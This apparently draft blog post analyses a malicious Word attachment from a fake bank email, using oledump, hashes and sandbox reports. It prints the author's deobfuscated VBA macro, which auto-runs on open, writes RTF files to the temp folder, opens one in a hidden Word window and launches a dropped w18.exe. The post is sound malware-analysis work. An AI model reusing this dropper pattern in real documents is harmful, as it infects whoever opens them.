Secure DOC Email Malware
draft post, needs more links and images
I spent a few pleasant hours today puzzling over a malware sample I received in email this week. Attached to a message from a bank I don’t do any business with was a Word document whose contents proclaim it holds an important secret message that can only seen if macros are enabled. I was hooked .. for the malware undoubtedly within !
Along the way I found about and devoured a video workshop from Didier Stevens, who makes the tools I was using. So, allow me to plug his firm DSL and the first malicious documents workshop .
ETA 16 Nov Lots of very smart people did analysis on other samples from this campaign. I read some really good stuff about it later on a closed list, and then these are public:
DSL’s oledump tool was very helpful in digging into the file. In fact I was fighting with the random variable names of the macro code for awhile before I thought to hash and lookup my sample. Here are those links:
Virustotal detection rate is pretty good now. I got my sample in the mail Wednesday 21 Oct. VT analysis
The public Cuckoo Sandbox instance at Malwr has some good details, including some dropped files info in their results
This MyOnlineSecurity post describes the campaign and related risks, and includes some screenshots of the doc as opened in MS Office.
$ ls -lh Secure\ Message.doc -rw-r--r-- 1 adric adric 73K Oct 21 13:08 Secure Message.doc $ md5sum Secure\ Message.doc e801337581de7c8b4e887a3f8f0944b3 Secure Message.doc $ file Secure\ Message.doc Secure Message.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 21 21:12:00 2015, Last Saved Time/Date: Wed Oct 21 17:23:00 2015, Number of Pages: 1, Number of Words: 535, Number of Characters: 3051, Security: 0 $ gstat Secure\ Message.doc File: âSecure Message.docâ Size: 74752 Blocks: 152 IO Block: 4096 regular file Device: 1000002h/16777218d Inode: 94755058 Links: 1 Access: (0644/-rw-r--r--) Uid: ( 502/ adric) Gid: ( 20/ staff) Access: 2015-10-23 19:25:30.000000000 -0400 Modify: 2015-10-21 13:08:31.000000000 -0400 Change: 2015-10-21 13:08:31.000000000 -0400 Birth: 2015-10-21 13:08:31.000000000 -0400
I did throw the sample at my local Cuckoo instance here in the home lab, but my victim virtual machine(s) don’t have winword (MS Office) so they couldn’t do anything with it.
DSL tools are available from Didier’s [website] (http://blog.didierstevens.com/), are included in REMnux, and come with the workshop as well.
A basic run of the tool shows the sections of the Office file and call out the macros for us with an M for functional macro code:
$ /opt/remnux-didier/oledump.py Secure\ Message.doc 1: 121 '\x01CompObj' 2: 4096 '\x05DocumentSummaryInformation' 3: 4096 '\x05SummaryInformation' 4: 9365 '1Table' 5: 4096 'Data' 6: 440 'Macros/PROJECT' 7: 41 'Macros/PROJECTwm' 8: M 4797 'Macros/VBA/ThisDocument' 9: 2765 'Macros/VBA/_VBA_PROJECT' 10: 515 'Macros/VBA/dir' 11: 205 'MsoDataStore/P5\xc3\x8f\xc3\x8cV\xc3\x99\xc3\x97\xc3\x96NEGE\xc3\x8fQY\xc3\x84\xc3\x87\xc3\x83\xc3\x92P\xc3\x8eQ==/Item' 12: 341 'MsoDataStore/P5\xc3\x8f\xc3\x8cV\xc3\x99\xc3\x97\xc3\x96NEGE\xc3\x8fQY\xc3\x84\xc3\x87\xc3\x83\xc3\x92P\xc3\x8eQ==/Properties' 13: 37482 'WordDocument'
We can isolate, decompress and export a stream like so:
/opt/remnux-didier/oledump.py -s 8 -v "Secure Message.doc" > macro
This macro is obfuscated a couple ways, including all of the variable and function names being noisy goo and some use of extra variables and concatenation. Here are a few lines, slightly altered as example:
Sub AutoOpen() YQGDJHASDB = "q,jwdlk XXXXXXXXXXX jkgasjkdhwqdasd" Auto_Open End Sub Sub Ljqhdsd() KAHDJKASND = "askdhjk ashdjk asghXXXXXXXXXXXX" Subipose End Sub
I fussed over the code of this macro for quite awhile renaming things to make some sense of it. Here’s my version:
## main for Word Sub AutoOpen() varY = "q,jwdlk XXXXXXXXXXXXXXXX jkgasjkdhwqdasd" Auto_Open ##run main for Excel End Sub ## orphan? Sub LK() varK = "askdhjk ashdjk asghXXXXXXXXXXXX" main End Sub Sub main() slash = "\" Temp = "TEMP" On Error Resume Next TMP = Environ$(Temp) & slash FEFE = ".e" FEFE = FEFE & "xe" DEDE = "." + "rt" + "f" TCA = TMP + "322" + DEDE ## $TEMP\322.rtf TCB = TMP + "311" + DEDE ## $TEMP\311.rtf TEX = TMP + "w18" & "" + FEFE ## $TEMP\w18.exe ## save RTFs to disk SaveFile (TCA) SaveFile (TCB) ## sleep? Sleep (2) ## Run Word Set wordObj = CreateObject("Word.Application") wordObj.Visible = False Set frame = wordObj.Documents.Open(TCA) ## create another Word window with 322.rtf, hide it ## sleep and then exec Sleep (2) Shell (TEX) ## run $Temp\w18.exe Sleep (1) ## stop other Word wordObj.Quit Set wordObj = Nothing ## kill Word End Sub ## for Excel Sub Workbook_Open() varX = "ansdh XXXXXXXXXXXXXXXX d" main End Sub ## Sleep == sleep(secs)? Sub Sleep(duration As Long) Dim Counter As Long Counter = Timer + duration Do While Timer < Counter DoEvents Loop End Sub ## Save File As RTF? Public Function SaveFile(Name As String) ActiveDocument.SaveAs FileName:=Name, FileFormat:=wdFormatRTF End Function ##main for Excel Sub Auto_Open() main varB = "qkwdhj XXXXXXXXXXXXXXXXd" End Sub
What I think it does: when the document is opened in Word or Excel it auto executes the main function to save the document to disk into temp files using Word to convert to RTF, twice ( $TEMP\322.rtf , $TEMP\311.rtf ). Another hidden Word window is opened to one of the those files ( $TEMP\322.rtf ) and used to execute a third file ( $TEMP\w18.exe ).
Checking back with the dynamic analysis from Malwr we see the 311 and 322 files drop, along with some other possible dropped files. 311 and 322 are slightly different sizes, but 10 time larger than our specimen at 771826, 771821 bytes. A third large file in Malwr is office.odf with is ~2.3 MB . VirusTotal for that indicate that it is a signed part of MS Office: “ Microsoft Office culture data dll” so that may be an artifact of the sandbox that isn’t relevant to the malware activity.
I think Malwr’s system wasn’t vulnerable so they didn’t get the payload. My hypothesis is that something in the Office doc can exploit Word when it is written out as and then read in as RTF.
The Word DOC contents include a note about a encrypted message ( “A message is encrypted by RSA key.” ) and an impressive looking block of noise marked as RSA encrypted and delimited by “—–RSA PROTECTED BLOCK—–” markers.
I pulled out the data block with oledump and trimmed with vi:
/opt/remnux-didier/oledump.py -s13 --cut '0x900:0x15c0' -d Secure\ Message.doc > q; vi q
I can’t make anything out if it yet, despite trying a few basic decoding tricks. It’s pretty random, according to CHI-squared analysis with DensityScout (in REMnux):
$ densityscout -m CHI q DensityScout (Build 43) by Christian Wojner Calculating density for file ... (Density) | Filename -------------------------------------------------------------- (42.4244) | q
Maybe it really is encrypted, with a RSA cipher, and some of the noise in the macro is key material?